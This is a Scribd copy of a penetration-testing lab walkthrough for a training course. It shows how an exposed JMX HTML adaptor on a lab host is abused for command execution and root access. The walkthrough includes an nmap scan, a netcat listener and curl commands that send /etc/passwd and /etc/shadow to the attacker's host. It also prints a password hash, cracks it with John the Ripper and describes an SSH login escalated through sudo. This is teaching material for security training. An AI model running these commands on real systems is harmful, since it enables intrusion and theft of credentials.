Scribd
Upload
161 views

© 2020 Caendra Inc. - Hera For Waptxv2 - HTML Adapter To Root

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
161 views

© 2020 Caendra Inc. - Hera For Waptxv2 - HTML Adapter To Root

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

1

© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root


GETTING STARTED

You are placed in an unknown network. Using nmap, discover an administrative console and explore it in
order to find a critical misconfiguration.

• Abuse an insecure administrative interface to gain code execution


• Then, extend your access to achieve a root shell on the target host

• Being familiar with JMX html adaptor interfaces


• Finding insecure JMX configurations
• Extending blind code execution to full compromise

• Burpsuite
• Browser
• Nmap
• Netcat
• A password cracking tool

© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root


GETTING STARTED

Target machine: 172.16.64.203

Find any exposed administrative interface and explore it.

Hint: Focus on non-default/custom functionality.

Focus on any non-default/custom functionality discovered during the previous task. Try achieving code
execution.

Hint: Explore all MBean components for command execution, but focus on the MBean’s only attribute.

There are multiple attack paths to become root.

Hint: Try to obtain sensitive files and crack them.

© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root


4

© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root


SOLUTIONS – TASK #1

Below, you can find solutions for each task. Remember though, that you can follow your own strategy,
which may be different from the one explained in the following lab.

We start with a standard nmap scan of the target host.

nmap -p- -sV -v -Pn 172.16.64.203 --open -T4


[…]
Nmap scan report for 172.16.64.203
Host is up (0.14s latency).
Not shown: 65199 closed ports, 333 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux;
protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8000/tcp open http-alt

We decide to investigate the non-standard http port that is visible in the results – 8000. It turns out to
expose an unprotected HTML Adaptor – which is a default JMX administrative interface.

© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root


SOLUTIONS – TASK #1

We can see many default methods of the HTML adapter. There might be various ways of achieving code
execution. First we will focus on a non-default method which is named DiagAgent. Customized MBeans
are more likely to be vulnerable or insecure than default ones. We will take a look at diagnosticsbean as
htmladapter is the service on port 8000 we are currently interacting with.

© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root


SOLUTIONS – TASK #2

The MBean consists of two functions that do not return any value and serve an unknown purpose. The
MBean also consists of one attribute (variable) that can be modified. We will try to inject OS commands
into that variable. It looks like the “Message” attribute simply holds a command to be executed.

• First, the Message attribute is set by editing it and pressing “Apply”


• Then, start() is launched by clicking the “start” button

Before any exploitation activity, let’s first run a netcat listener.

nc -lvp 7000

“Message” is set to curl [your ip] [listener port]:

curl http://172.16.64.3:7000/rce

The below screenshot shows the process.

© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root


SOLUTIONS – TASK #2

Upon clicking “start” we get the request from the vulnerable server which confirms code execution.

© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root


SOLUTIONS – TASK #3

Now we should be able to abuse code execution. Let’s try to exfiltrate data using curl. We will change
the “Message” attribute again, this time to the below.

curl http://172.16.64.3:7000/rce -T /etc/passwd


curl http://172.16.64.3:7000/rce -T /etc/shadow

After each change of the Message value we restart the netcat listener and press “start” again.

This way first, we can check if the current user is root and if so, we will obtain the password hashes.

Exfiltration of the shadow file succeeds which means that:

• The code execution context is root


• We obtained one password hash down the file which may be a candidate for offline cracking

The leaked password hash is:

xslt:$6$JUkOpKwn$ey9L68IqMovtItur1fLG0eWUh2f7NfCRJbmNpFCfk0oYw8Ldjt0ZkIeeyqZ5
4APpXd7tDTWtHxPeI0FqRlkDT.:18257:0:99999:7:::

Let’s use the rockyou wordlist below.

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-05.txt

Using john the ripper, the password is instantly cracked.

© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root


SOLUTIONS – TASK #3

Knowing that SSH is open we can try to log in with that user. As root account is disabled and this is the
only account on the filesystem with a password, we can suspect it has some extended privileges.

By inspecting sudo rights (see above) we confirm that knowing the password of that user is enough to
take complete control over the machine.

10

© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root

You might also like